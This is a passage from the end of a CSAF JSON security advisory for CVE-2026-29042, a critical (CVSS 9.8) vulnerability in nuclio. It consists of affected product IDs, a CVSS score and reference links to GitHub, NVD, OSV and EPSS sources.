                    "CSAFPID-5908879",
                    "CSAFPID-5908880",
                    "CSAFPID-5908881",
                    "CSAFPID-5908882",
                    "CSAFPID-5908883",
                    "CSAFPID-5908884",
                    "CSAFPID-5908885",
                    "CSAFPID-5908886",
                    "CSAFPID-5908887",
                    "CSAFPID-5908888",
                    "CSAFPID-5908889",
                    "CSAFPID-5908890",
                    "CSAFPID-5908891",
                    "CSAFPID-5908892",
                    "CSAFPID-5908893",
                    "CSAFPID-5908894",
                    "CSAFPID-5908895",
                    "CSAFPID-5908896",
                    "CSAFPID-5908897",
                    "CSAFPID-5908898",
                    "CSAFPID-5908899",
                    "CSAFPID-5908900",
                    "CSAFPID-5908901",
                    "CSAFPID-5908902",
                    "CSAFPID-5908903",
                    "CSAFPID-5908904",
                    "CSAFPID-5908905",
                    "CSAFPID-5908906",
                    "CSAFPID-5908907",
                    "CSAFPID-5908908",
                    "CSAFPID-5908909",
                    "CSAFPID-5908910",
                    "CSAFPID-5908911",
                    "CSAFPID-5908912",
                    "CSAFPID-5908913",
                    "CSAFPID-5908914",
                    "CSAFPID-5908915",
                    "CSAFPID-5908916",
                    "CSAFPID-5908917",
                    "CSAFPID-5908918",
                    "CSAFPID-5908919",
                    "CSAFPID-5908920",
                    "CSAFPID-5908921",
                    "CSAFPID-5908922",
                    "CSAFPID-5908923",
                    "CSAFPID-5908924",
                    "CSAFPID-5908925",
                    "CSAFPID-5908926",
                    "CSAFPID-5908927",
                    "CSAFPID-5908928",
                    "CSAFPID-5908929",
                    "CSAFPID-5908930",
                    "CSAFPID-5908931",
                    "CSAFPID-5908932",
                    "CSAFPID-5908933",
                    "CSAFPID-5908934",
                    "CSAFPID-5908935",
                    "CSAFPID-5908936",
                    "CSAFPID-5908937",
                    "CSAFPID-5908938",
                    "CSAFPID-5908939",
                    "CSAFPID-5908940",
                    "CSAFPID-5908941",
                    "CSAFPID-5908942",
                    "CSAFPID-5908943",
                    "CSAFPID-5908944",
                    "CSAFPID-5908945",
                    "CSAFPID-5908946",
                    "CSAFPID-5908947",
                    "CSAFPID-5908948",
                    "CSAFPID-5908949",
                    "CSAFPID-5908950",
                    "CSAFPID-5908951",
                    "CSAFPID-5908952",
                    "CSAFPID-5908953",
                    "CSAFPID-5908954",
                    "CSAFPID-5908955",
                    "CSAFPID-5908956",
                    "CSAFPID-5908957",
                    "CSAFPID-5908958",
                    "CSAFPID-5908959",
                    "CSAFPID-5908960",
                    "CSAFPID-5908961",
                    "CSAFPID-5908962",
                    "CSAFPID-5908963",
                    "CSAFPID-5908964",
                    "CSAFPID-5908965",
                    "CSAFPID-5908966",
                    "CSAFPID-5908967",
                    "CSAFPID-5908968",
                    "CSAFPID-5908969",
                    "CSAFPID-5908970",
                    "CSAFPID-5908971",
                    "CSAFPID-5908972",
                    "CSAFPID-5908973",
                    "CSAFPID-5908974",
                    "CSAFPID-5908975",
                    "CSAFPID-5908976",
                    "CSAFPID-5908977",
                    "CSAFPID-5908978",
                    "CSAFPID-5908979",
                    "CSAFPID-5908980",
                    "CSAFPID-5908981",
                    "CSAFPID-5908982",
                    "CSAFPID-5908983",
                    "CSAFPID-5908984",
                    "CSAFPID-5908985",
                    "CSAFPID-5908986",
                    "CSAFPID-5908987",
                    "CSAFPID-5908988",
                    "CSAFPID-5908989",
                    "CSAFPID-5908990",
                    "CSAFPID-5908991",
                    "CSAFPID-5908992",
                    "CSAFPID-5908993",
                    "CSAFPID-5908994",
                    "CSAFPID-5908995",
                    "CSAFPID-5908996",
                    "CSAFPID-5908997",
                    "CSAFPID-5908998",
                    "CSAFPID-5908999",
                    "CSAFPID-5909000",
                    "CSAFPID-5909001",
                    "CSAFPID-5909002",
                    "CSAFPID-5909003",
                    "CSAFPID-5909004",
                    "CSAFPID-5909005",
                    "CSAFPID-5909006",
                    "CSAFPID-5909007",
                    "CSAFPID-5909008",
                    "CSAFPID-5909009",
                    "CSAFPID-5909010",
                    "CSAFPID-5909011",
                    "CSAFPID-5909012",
                    "CSAFPID-5909013",
                    "CSAFPID-5909014",
                    "CSAFPID-5909015",
                    "CSAFPID-5909016",
                    "CSAFPID-5909017",
                    "CSAFPID-5909018",
                    "CSAFPID-5909019",
                    "CSAFPID-5909020",
                    "CSAFPID-5909021",
                    "CSAFPID-5909022",
                    "CSAFPID-5909023",
                    "CSAFPID-5909024",
                    "CSAFPID-5909025"
                ]
            },
            "references": [
                {
                    "category": "external",
                    "summary": "Source - github",
                    "url": "https://github.com/advisories/GHSA-95fj-3w7g-4r27"
                },
                {
                    "category": "external",
                    "summary": "Source raw - github",
                    "url": "https://api.github.com/advisories/GHSA-95fj-3w7g-4r27"
                },
                {
                    "category": "external",
                    "summary": "Source - osv",
                    "url": "https://www.googleapis.com/download/storage/v1/b/osv-vulnerabilities/o/Go%2FGHSA-95fj-3w7g-4r27.json?alt=media"
                },
                {
                    "category": "external",
                    "summary": "Source - nvd",
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-29042"
                },
                {
                    "category": "external",
                    "summary": "Source raw - nvd",
                    "url": "https://services.nvd.nist.gov/rest/json/cves/2.0?cveId=CVE-2026-29042"
                },
                {
                    "category": "external",
                    "summary": "Source - cveprojectv5",
                    "url": "https://www.cve.org/CVERecord?id=CVE-2026-29042"
                },
                {
                    "category": "external",
                    "summary": "Source raw - cveprojectv5",
                    "url": "https://raw.githubusercontent.com/CVEProject/cvelistV5/main/cves/2026/29xxx/CVE-2026-29042.json"
                },
                {
                    "category": "external",
                    "summary": "Source - first",
                    "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-29042"
                },
                {
                    "category": "external",
                    "summary": "Source raw - first",
                    "url": "https://api.first.org/data/v1/epss?limit=10000&offset=0"
                },
                {
                    "category": "external",
                    "summary": "Source - first",
                    "url": "https://api.first.org/data/v1/epss?limit=10000&offset=0"
                },
                {
                    "category": "external",
                    "summary": "Source - osv",
                    "url": "https://www.googleapis.com/download/storage/v1/b/osv-vulnerabilities/o/Go%2FGO-2026-4598.json?alt=media"
                },
                {
                    "category": "external",
                    "summary": "Source - osv",
                    "url": "https://www.googleapis.com/download/storage/v1/b/osv-vulnerabilities/o/GIT%2FCVE-2026-29042.json?alt=media"
                },
                {
                    "category": "external",
                    "summary": "Reference - cveprojectv5; github; nvd; osv",
                    "url": "https://github.com/nuclio/nuclio/security/advisories/GHSA-95fj-3w7g-4r27"
                },
                {
                    "category": "external",
                    "summary": "Reference - cveprojectv5; github; nvd; osv",
                    "url": "https://github.com/nuclio/nuclio/pull/4030"
                },
                {
                    "category": "external",
                    "summary": "Reference - cveprojectv5; github; nvd; osv",
                    "url": "https://github.com/nuclio/nuclio/commit/5352d7e16cf92f4350a2f8d806c4b80b626b5c5a"
                },
                {
                    "category": "external",
                    "summary": "Reference - cveprojectv5; github; nvd; osv",
                    "url": "https://github.com/nuclio/nuclio/releases/tag/1.15.20"
                },
                {
                    "category": "external",
                    "summary": "Reference - github",
                    "url": "https://github.com/advisories/GHSA-95fj-3w7g-4r27"
                },
                {
                    "category": "external",
                    "summary": "Reference - github; osv",
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-29042"
                },
                {
                    "category": "external",
                    "summary": "Reference - osv",
                    "url": "https://github.com/CVEProject/cvelistV5/tree/main/cves/2026/29xxx/CVE-2026-29042.json"
                }
            ],
            "scores": [
                {
                    "cvss_v3": {
                        "version": "3.1",
                        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
                        "baseScore": 9.8,
                        "baseSeverity": "CRITICAL"
                    },
                    "products": [
                        "CSAFPID-5759448",
                        "CSAFPID-5765482",
                        "CSAFPID-5778684",
                        "CSAFPID-5908758",
                        "CSAFPID-5908759",
                        "CSAFPID-5908760",
                        "CSAFPID-5908761",
                        "CSAFPID-5908762",
                        "CSAFPID-5908763",
                        "CSAFPID-5908764",
                        "CSAFPID-5908765",
                        "CSAFPID-5908766",
                        "CSAFPID-5908767",
                        "CSAFPID-5908768",
                        "CSAFPID-5908769",
                        "CSAFPID-5908770",
                        "CSAFPID-5908771",
                        "CSAFPID-5908772",
                        "CSAFPID-5908773",
                        "CSAFPID-5908774",
                        "CSAFPID-5908775",
                        "CSAFPID-5908776",
                        "CSAFPID-5908777",
                        "CSAFPID-5908778",
                        "CSAFPID-5908779",
                        "CSAFPID-5908780",
                        "CSAFPID-5908781",
                        "CSAFPID-5908782",
                        "CSAFPID-5908783",
                        "CSAFPID-5908784",
                        "CSAFPID-5908785",
                        "CSAFPID-5908786",
                        "CSAFPID-5908787",
                        "CSAFPID-5908788",
                        "CSAFPID-5908789",
                        "CSAFPID-5908790",
                        "CSAFPID-5908791",
                        "CSAFPID-5908792",
                        "CSAFPID-5908793",
                        "CSAFPID-5908794",
                        "CSAFPID-5908795",
                        "CSAFPID-5908796",
                        "CSAFPID-5908797",
                        "CSAFPID-5908798",
                        "CSAFPID-5908799",
                        "CSAFPID-5908800",
                        "CSAFPID-5908801",
                        "CSAFPID-5908802",
                        "CSAFPID-5908803",
                        "CSAFPID-5908804",
                        "CSAFPID-5908805",
                        "CSAFPID-5908806",
                        "CSAFPID-5908807",
                        "CSAFPID-5908808",
                        "CSAFPID-5908809",
                        "CSAFPID-5908810",
                        "CSAFPID-5908811",
                        "CSAFPID-5908812",
                        "CSAFPID-5908813",
                        "CSAFPID-5908814",
                        "CSAFPID-5908815",
                        "CSAFPID-5908816",
                        "CSAFPID-5908817",
                        "CSAFPID-5908818",
                        "CSAFPID-5908819",
                        "CSAFPID-5908820",
                        "CSAFPID-5908821",
                        "CSAFPID-5908822",
                        "CSAFPID-5908823",
                        "CSAFPID-5908824",
                        "CSAFPID-5908825",
                        "CSAFPID-5908826",
                        "CSAFPID-5908827",
                        "CSAFPID-5908828",
                        "CSAFPID-5908829",
                        "CSAFPID-5908830",
                        "CSAFPID-5908831",
                        "CSAFPID-5908832",
                        "CSAFPID-5908833",
                        "CSAFPID-5908834",
                        "CSAFPID-5908835",
                        "CSAFPID-5908836",
                        "CSAFPID-5908837",
                        "CSAFPID-5908838",
                        "CSAFPID-5908839",
                        "CSAFPID-5908840",
                        "CSAFPID-5908841",
                        "CSAFPID-5908842",
                        "CSAFPID-5908843",
                        "CSAFPID-5908844",
                        "CSAFPID-5908845",
                        "CSAFPID-5908846",
                        "CSAFPID-5908847",
                        "CSAFPID-5908848",
                        "CSAFPID-5908849",
                        "CSAFPID-5908850",
                        "CSAFPID-5908851",
                        "CSAFPID-5908852",
                        "CSAFPID-5908853",
                        "CSAFPID-5908854",
                        "CSAFPID-5908855",
                        "CSAFPID-5908856",
                        "CSAFPID-5908857",
                        "CSAFPID-5908858",
                        "CSAFPID-5908859",
                        "CSAFPID-5908860",
                        "CSAFPID-5908861",
                        "CSAFPID-5908862",
                        "CSAFPID-5908863",
                        "CSAFPID-5908864",
                        "CSAFPID-5908865",
                        "CSAFPID-5908866",
                        "CSAFPID-5908867",
                        "CSAFPID-5908868",
                        "CSAFPID-5908869",
                        "CSAFPID-5908870",
                        "CSAFPID-5908871",
                        "CSAFPID-5908872",
                        "CSAFPID-5908873",
                        "CSAFPID-5908874",
                        "CSAFPID-5908875",
                        "CSAFPID-5908876",
                        "CSAFPID-5908877",
                        "CSAFPID-5908878",
                        "CSAFPID-5908879",
                        "CSAFPID-5908880",
                        "CSAFPID-5908881",
                        "CSAFPID-5908882",
                        "CSAFPID-5908883",
                        "CSAFPID-5908884",
                        "CSAFPID-5908885",
                        "CSAFPID-5908886",
                        "CSAFPID-5908887",
                        "CSAFPID-5908888",
                        "CSAFPID-5908889",
                        "CSAFPID-5908890",
                        "CSAFPID-5908891",
                        "CSAFPID-5908892",
                        "CSAFPID-5908893",
                        "CSAFPID-5908894",
                        "CSAFPID-5908895",
                        "CSAFPID-5908896",
                        "CSAFPID-5908897",
                        "CSAFPID-5908898",
                        "CSAFPID-5908899",
                        "CSAFPID-5908900",
                        "CSAFPID-5908901",
                        "CSAFPID-5908902",
                        "CSAFPID-5908903",
                        "CSAFPID-5908904",
                        "CSAFPID-5908905",
                        "CSAFPID-5908906",
                        "CSAFPID-5908907",
                        "CSAFPID-5908908",
                        "CSAFPID-5908909",
                        "CSAFPID-5908910",
                        "CSAFPID-5908911",
                        "CSAFPID-5908912",
                        "CSAFPID-5908913",
                        "CSAFPID-5908914",
                        "CSAFPID-5908915",
                        "CSAFPID-5908916",
                        "CSAFPID-5908917",
                        "CSAFPID-5908918",
                        "CSAFPID-5908919",
                        "CSAFPID-5908920",
                        "CSAFPID-5908921",
                        "CSAFPID-5908922",
                        "CSAFPID-5908923",
                        "CSAFPID-5908924",
                        "CSAFPID-5908925",
                        "CSAFPID-5908926",
                        "CSAFPID-5908927",
                        "CSAFPID-5908928",
                        "CSAFPID-5908929",
                        "CSAFPID-5908930",
                        "CSAFPID-5908931",
                        "CSAFPID-5908932",
                        "CSAFPID-5908933",
                        "CSAFPID-5908934",
                        "CSAFPID-5908935",
                        "CSAFPID-5908936",
                        "CSAFPID-5908937",
                        "CSAFPID-5908938",
                        "CSAFPID-5908939",
                        "CSAFPID-5908940",
                        "CSAFPID-5908941",
                        "CSAFPID-5908942",
                        "CSAFPID-5908943",
                        "CSAFPID-5908944",
                        "CSAFPID-5908945",
                        "CSAFPID-5908946",
                        "CSAFPID-5908947",
                        "CSAFPID-5908948",
                        "CSAFPID-5908949",
                        "CSAFPID-5908950",
                        "CSAFPID-5908951",
                        "CSAFPID-5908952",
                        "CSAFPID-5908953",
                        "CSAFPID-5908954",
                        "CSAFPID-5908955",
                        "CSAFPID-5908956",
                        "CSAFPID-5908957",
                        "CSAFPID-5908958",
                        "CSAFPID-5908959",
                        "CSAFPID-5908960",
                        "CSAFPID-5908961",
                        "CSAFPID-5908962",
                        "CSAFPID-5908963",
                        "CSAFPID-5908964",
                        "CSAFPID-5908965",
                        "CSAFPID-5908966",
                        "CSAFPID-5908967",
                        "CSAFPID-5908968",
                        "CSAFPID-5908969",
                        "CSAFPID-5908970",
                        "CSAFPID-5908971",
                        "CSAFPID-5908972",
                        "CSAFPID-5908973",
                        "CSAFPID-5908974",
                        "CSAFPID-5908975",
                        "CSAFPID-5908976",
                        "CSAFPID-5908977",
                        "CSAFPID-5908978",
                        "CSAFPID-5908979",
                        "CSAFPID-5908980",
                        "CSAFPID-5908981",
                        "CSAFPID-5908982",
                        "CSAFPID-5908983",
                        "CSAFPID-5908984",
                        "CSAFPID-5908985",
                        "CSAFPID-5908986",
                        "CSAFPID-5908987",
                        "CSAFPID-5908988",
                        "CSAFPID-5908989",
                        "CSAFPID-5908990",
                        "CSAFPID-5908991",
                        "CSAFPID-5908992",
                        "CSAFPID-5908993",
                        "CSAFPID-5908994",
                        "CSAFPID-5908995",
                        "CSAFPID-5908996",
                        "CSAFPID-5908997",
                        "CSAFPID-5908998",
                        "CSAFPID-5908999",
                        "CSAFPID-5909000",
                        "CSAFPID-5909001",
                        "CSAFPID-5909002",
                        "CSAFPID-5909003",
                        "CSAFPID-5909004",
                        "CSAFPID-5909005",
                        "CSAFPID-5909006",
                        "CSAFPID-5909007",
                        "CSAFPID-5909008",
                        "CSAFPID-5909009",
                        "CSAFPID-5909010",
                        "CSAFPID-5909011",
                        "CSAFPID-5909012",
                        "CSAFPID-5909013",
                        "CSAFPID-5909014",
                        "CSAFPID-5909015",
                        "CSAFPID-5909016",
                        "CSAFPID-5909017",
                        "CSAFPID-5909018",
                        "CSAFPID-5909019",
                        "CSAFPID-5909020",
                        "CSAFPID-5909021",
                        "CSAFPID-5909022",
                        "CSAFPID-5909023",
                        "CSAFPID-5909024",
                        "CSAFPID-5909025"
                    ]
                }
            ],
            "title": "CVE-2026-29042"
        }
    ]
}